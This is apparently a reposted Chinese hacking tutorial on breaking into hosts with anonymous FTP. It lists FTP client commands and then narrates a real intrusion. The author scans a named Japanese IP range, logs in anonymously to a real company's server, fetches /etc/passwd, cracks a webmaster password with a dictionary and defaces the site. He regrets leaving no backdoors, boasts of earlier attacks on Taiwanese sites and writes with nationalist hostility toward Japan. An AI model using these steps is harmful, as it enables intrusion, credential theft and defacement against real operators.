关于允许匿名登陆的主机的简单入侵

来源:互联网 发布:腾讯游戏礼包软件 编辑:程序博客网 时间:2024/05/08 00:27

今天我们来看看允许匿名登陆的主机的简单入侵方法。 
所需工具: 
FTP scanner v2.1.48 
  
下载地址: http://202.103.69.85/city/ftpscaner.zip 1.99M. 
  
***为了你的安全,下载后,请先杀毒!*** 
======================= 
我们这里说的允许匿名登陆的主机是说的匿名FTP登陆
呵呵 
大家也有可能连FTP是什么也不知道. 
:) 
我们先来看看有关它们的名词解释: 
FTP
 (FileTransfer Protocol) 文件传送协议 
  FTP
是在Internet网络上最早用于传输文件的一种通信协议,它是将本地计算机通过登录注册成为远程主机的客户端,通常我们将采用该协议传输文件的程序称为FTP软件。 
  
  
使用FTP可以从Internet网络上获取远程主机的各类文件信息,包括公用程序、各类应用程序、情报信息等等。FTP支持ASCIIBinary两种传输模式,并且可以在两种模式之间切换。 
  
FTP
在实际文件传输中不需要对文件的内容进行修改或解释,也就是说进行的是明码的传输,这样就注定了其安全性的不可靠性。FTP运行在OSI模型的应用
层,并利用传输控制协议TCP在不同的主机之间提供可靠的数据传输。FTP在文件传输中支持断点再续,这样大幅度的减少了CPU和网络带宽的开销。利用
FTP
做攻击也是网络攻击中最为普通的形式. 
  
我们来看看他的相关命令.你也可以在Ms-dos下输入ftp -help 得到 
  ****************************************** 
FTP
的命令行格式为:ftp -v -d -i -n -g [主机名 
其中 -v 显示远程服务器的所有响应信息; -n 限制ftp的自动登录,即不使用;.n 
  etrc
文件; -d 使用调试方式; -g 取消全局文件名。 
  FTP
使用的内部命令如下(中括号表示可选项): 
1.![cmd[args]]
:在本地机中执行交互shellexit回到ftp环境,如:!ls*.zip 
  
2.$ macro-ame[args]
 执行宏定义macro-name 
3.account[password]
 提供登录远程系统成功后访问系统资源所需的补充口令。 
  
4.append local-file[remote-file]
:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。 
  
5.ascii
:使用ascii类型传输方式。 
6.bell
:每个命令执行完毕后计算机响铃一次。 
7.bin
:使用二进制文件传输方式。 
8.bye
:退出ftp会话过程。 
9.case
:在使用mget时,将远程主机文件名中的大写转为小写字母。 
10.cd remote-dir
:进入远程主机目录。 
11.cdup
:进入远程主机目录的父目录。 
12.chmod mode file-name
:将远程主机文件file-name的存取方式设置为mode,如:chmod 
  777 a.out
 
13.close
:中断与远程服务器的ftp会话(open对应) 
14.cr
:使用asscii方式传输文件时,将回车换行转换为回行。 
15.delete remote-file
:删除远程主机文件。 
16.debug[debug-value]
:设置调试方式, 显示发送至远程主机的每条命令,如:deb 
  up 3
,若设为0,表示取消debug 
17.dir[remote-dir][local-file]
:显示远程主机目录,并将结果存入本地文件 
  
18.disconnection
:同close 
19.form format
:将文件传输方式设置为format,缺省为file方式。 
20.get remote-file[local-file]
 将远程主机的文件remote-file传至本地硬盘的local-file 
  
21.glob
:设置mdeletemgetmput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。 
  
22.hash
:每传输1024字节,显示一个hash符号(#) 
23.help[cmd]
:显示ftp内部命令cmd的帮助信息,如:helpget 
24.idle[seconds]
:将远程服务器的休眠计时器设为[seconds]秒。 
25.image
:设置二进制传输方式(binary) 
26.lcd[dir]
:将本地工作目录切换至dir 
27.ls[remote-dir][local-file]
:显示远程目录remote-dir 
  
并存入本地文件local-file 
28.macdef macro-name
:定义一个宏,遇到macdef下的空行时,宏定义结束。 
  
29.mdelete[remote-file]
:删除远程主机文件。 
30.mdir remote-files local-file
:与dir类似,但可指定多个远程文件,如 
  
mdir *.o.*.zipoutfile  
31.mget remote-files
:传输多个远程文件。 
32.mkdir dir-name
:在远程主机中建一目录。 
33.mls remote-file local-file
:同nlist,但可指定多个文件名。 
  
34.mode[modename]
:将文件传输方式设置为modename 缺省为stream方式。 
  
35.modtime file-name
:显示远程主机文件的最后修改时间。 
36.mput local-file
:将多个文件传输至远程主机。 
37.newer file-name
 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。 
  
38.nlist[remote-dir][local-file]
:显示远程主机目录的文件清单,并存入本地硬盘的local-file 
  
39.nmap[inpattern outpattern]
:设置文件名映射机制, 使得文件传输时,文件中的某些字符相互转换, 
  
如:nmap $1.$2.$3[$1$2].[$2$3],则传输文件a1.a2.a3时,文件名变为a1a2 该命令特别适用于远程主机为非UNIX机的情况。 
  
40.ntrans[inchars[outchars]]
:设置文件名字符的翻译机制,如ntrans1R,则文件名LLL将变为RRR 
  
41.open host[port]
:建立指定ftp服务器连接,可指定连接端口。 
42.passive
:进入被动传输方式。 
43.prompt
:设置多个文件传输时的交互提示。 
44.proxy ftp-cmd
:在次要控制连接中,执行一条ftp命令, 该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。 
  
45.put local-file[remote-file]
:将本地文件local-file传送至远程主机。 
  
46.pwd
:显示远程主机的当前工作目录。 
47.quit
:同bye,退出ftp会话。 
48.quote arg1
arg2...:将参数逐字发至远程ftp服务器,如:quote 
  syst. 
49.recv remote-file[local-file]
:同get 
50.reget remote-file[local-file]
:类似于get 但若local-file存在,则从上次传输中断处续传。 
  
51.rhelp[cmd-name]
:请求获得远程主机的帮助。 
52.rstatus[file-name]
:若未指定文件名,则显示远程主机的状态, 否则显示文件状态。 
  
53.rename[from][to]
:更改远程主机文件名。 
54.reset
:清除回答队列。 
55.restart marker
:从指定的标志marker处,重新开始getput,如:restart 
  130
 
56.rmdir dir-name
:删除远程主机目录。 
57.runique
:设置文件名只一性存储,若文件存在,则在原文件后加后缀.1 .2等。 
  
58.send local-file[remote-file]
:同put 
59.sendport
:设置PORT命令的使用。 
60.site arg1
arg2...:将参数作为SITE命令逐字发送至远程ftp主机。 
  
61.size file-name
:显示远程主机文件大小,如:site idle 7200 
  
62.status
:显示当前ftp状态。 
63.struct[struct-name]
:将文件传输结构设置为struct-name 
  
缺省时使用stream结构。 
64.sunique
:将远程主机文件名存储设置为只一(runique对应) 
65.system
:显示远程主机的操作系统类型。 
66.tenex
:将文件传输类型设置为TENEX机的所需的类型。 
67.tick
:设置传输时的字节计数器。 
68.trace
:设置包跟踪。 
69.type[type-name]
:设置文件传输类型为type-name,缺省为ascii,如:type 
  binary
,设置二进制传输方式。 
70.umask[newmask]
:将远程服务器的缺省umask设置为newmask,如:umask 
  3 
71.user user-name[password][account]
:向远程主机表明自己的身份,需要口令时,必须输入口令,如:user 
  anonymous my@email
 
72.verbose
:同命令行的-v参数,即设置详尽报告方式,ftp 服务器的所有响 应都将显示给用户,缺省为on. 
  
73.?[cmd]
:同help. 
  FTPD FTP
服务器监视程序、FTP守护进程 
  FTPD
是标准的FTP服务器监视程序(Daemon)。它用来应答由inetd接受的连接请求并把这些请求通知文件传输器。Unix系统上FTPD是个标准的组成部分. 
  
  FTP server FTP
服务器 
FTP
服务器是Internet上的重要组成部分,它可以使用户通过FTP协议来做用户自己喜欢做的事情。FTP服务器目前有很多的版本和型号以及品牌。
但这些版本的安全也是相当受到重视的。他们都因某种错误配置或缺陷而存在有安全漏洞,最为严重的就算是wu-ftpd934月以前的那个版。 
  Anonymous FTP 
匿名FTP 
  
在网络中最常用的文件传输协议。允许用户使用AnonymousFTP作为用户名以用户信箱做为口令(确切的说是任何带@的口令)登陆到系统。虽说匿名FTP本身 
  
并不是个漏洞,因为匿名区域里放置有/etc/passwd/etc/group文件,往往可能因为管理员配置上的大意造成潜在的安全隐患。 
  
使用匿名的FTP,用户可以匿名登陆FTP服务器。登陆时需要用户提供完整的E-mail地址做为passwd,其实在很多站点上这个要求形同虚设,你只要在其中包含有@字节看起来像个E-mail地址就行了,主机不会对口令做任何效验的。 
  
远程所提供FTP服务的主机在处理匿名用户的命令时,一般都会执行一个chroot命令让匿名者进入主机所允许的匿名FTP区域。然而为了支持匿名FTP
和用户FTPFTP服务器要访问所有文件,也就证明了FTP服务器不是总在chroot环境中运行的。这个环节会让一些愚蠢的管理员不知所为而未曾理
会,很容易被有心者所利用而得到一个匿名FTP用户所不能得到的权限。 
  
一般解决这个问题可以通过修改inetd的配置来替代直接启动FTP服务器,它执行chroot(就类似于chrootuid的程序),然后再启动服务器就可以了。 
  
一般情况下,FTP只限于在匿名用户下访问,匿名用户有其正常的权限,在启动服务器前执行chroot就意味着匿名用户将受到限制。(注意:很多FTP
务器在其建立匿名FTP系统中只单纯的依赖自己购买FTP服务器的销售说明书中所讲述的来做,而往往这些销售说明中一般都不会谈到漏洞和堵塞漏洞的方法,
这个大意是绝对致命的)。 
  
如果说一个匿名用户在FTP服务器的匿名区域获得了一份不应该是匿名用户获得的文件,那么就说明了可能有内部客户将这个文件放置在匿名的FTP区域了。 
  
在很多网络攻击事例中用匿名用户可以阅读到/etc/passwd文件这就是管理员很大错误表现。还有隐患是telnetftp21如果允许执行SITECHMODSITE 
  EXEC
/home的所有者是匿名FTP的用户,那么随便就可把权限设置成777或者更多的进行修改等等。 
  
先下载FTP scanner 这个软件,我们需要用到它。 
杀毒,安装好后,我们从开始菜单中的程序中找到FTP Scanner并运行它。 
我们熟悉一下我们要使用的软件的界面。 
:) 
打开软件我们可以看到 
Host 
主机 
  Beginning 
开始IP 
下面有几个文本框 
我们在这里填入我们要开始扫描的IP. 
  Ending 
结束IP 
下面有几个文本框 
我们在这里填入我们结束扫描的IP. 
  
在下面有一个 
Threads 
线程 
我们可以根据网速来选择这里的线程数
通常Moden上网选为50--70左右
更快的话选到100个线程
  
然后我们选择菜单Session 里的BeginFTP scan 
就可以开始了扫描了.
:) 
  ====================================== 
应用技巧: 
我们可以在View 里的options选项里选择我们的扫描参数. 
  
Login config 
里的UserName Password我们通常不用更改. 
但你也可以改动他. 
比如你想扫描特定的帐号.比如扫描用户 Oracle密码也是Oracle的话 
就改动这里的 UserName  Password 
  
IP Logging 
我们可以更改扫描结果存放的位置. 
随便选择一个位置和文件名就可以了. 
默认是存放在安装目录下面的iplog.txt文件. 
====================================== 
  
台湾的机器我们干掉的太多了,伤及了很多平民网站. 
在这里我对我以前的行为作出检讨. 
这次,我们来日本看看。:) 
相信大家不会不恨小日本吧. 
  
去搜狐网站敲了一个日本,搜索一下, 
找到1000多个相关网站。 
然后,随便挑了一个: 
www.jcbus.co.jp 
ping www.jcbus.co.jp 
得到它的IP 
210.143.99.80 
我们来扫描 
210.143.99.1-------210.143.99.254 
因为我们不是对特定的主机来攻击.现在我们做的只是在一堆机器里面找. 
呵呵:) 
  
过了几分钟 
结果出来了,找到了10台. 
我们来到安装这个扫描器的目录下查看iplog.txt 
可以看到. 
210.143.99.21 
210.143.99.68 
210.143.99.80==* 
210.143.99.94 
210.143.99.121 
210.143.99.130 
210.143.99.189 
210.143.99.175 
210.143.99.200 
210.143.99.249 
  
运气不错 
看到了吗? 
www.jcbus.co.jp
是可以匿名进去的. 
我们就进这个看看吧.:) 
  C:/>ftp 210.143.99.80 
Connected to ns.jcbus.co.jp. 220ns.jcbus.co.jp 
  FTP server (Versionwu-2.4.2-academ[BETA-15](1) Tue Jan 19 00 :22:43 GMT 1999) 
  ready. 
User (ns.jcbus.co.jp:(none)): 
  
呵呵 Wu-ftp 2.4.2 
好象有很大的漏洞哦.:) 
不过不在我们今天的教程介绍范围. 
  
我们用FTP进去看看. 
  User (210.143.99.200:(none)):ftp 
331 Guest login ok, send your completee-mail 
  address as password. 
  Password: ftp@
   ----(可以随便输入) 
230-The response 'ftp' is not valid 230-Next 
  time please use your e-mail address asyour password 
230- for example: joe@202.104.49.193 
230Guest login ok, access restrictions apply. 
  
ftp> 
  
呵呵 
先看看能不能去根目录. 
ftp> cd / 
250 CWD command successful. 
ftp> ls 
200 PORT command successful. 
150 ASCII data connection for /bin/ls(202.104.49.193,2643) 
  (0 bytes). 
bin 
cdrom 
dev 
devices 
etc 
.... 
.... 
.... 
  ASCII Transfer complete. 
ftp: 161 bytes received in 0.81Seconds0.20Kbytes/sec. 
  ftp> 
呵呵 
执行成功:) 
今天运气不错.可能那个MM在想着我了.-----真恶心,:) 
但在它的网页的目录里我没有写权限.:( 
只好先把密码档先当下来. 
ftp> get /etc/passwd 
把密码档搞下来. 
  
然后用小榕的流光提取用户. 
26
个用户. 
挂上一个小字典跑. 
几分钟过去后, 
终于找到一个可以利用的shell了. 
user: webmaster 
passwd: web 
  
呵呵 
这个家伙真笨. 
  
上载了一个脚本,后果嘛,就不用我多说了. 
放上一段国歌,插上国旗,找了两个网友欣赏了一下. 
1
个小时后,网页恢复了. 
我回去看了看ftpwebmaster都不能登陆了. 
 
早知道给他留几个后门.:( 
  
这是一次关于允许匿名登陆的主机的简单入侵 
  
Redhat 4.2 
  
其实我们可以发现. 
NT
系统的允许匿名登陆的主机更多 
很多主机更离谱的是.anonymous竟然有到根目录和写的权限. 
能够找到的更多. 不知道他们是怎么搞的. 
通常可以找到的是WebIIS4.0IIS3.0NT 
国内的这样的机器真的不少. 
不过我发现日本的redhat倒真的不少.有几个网段我扫描过的竟然清一色全部是redhat

原创粉丝点击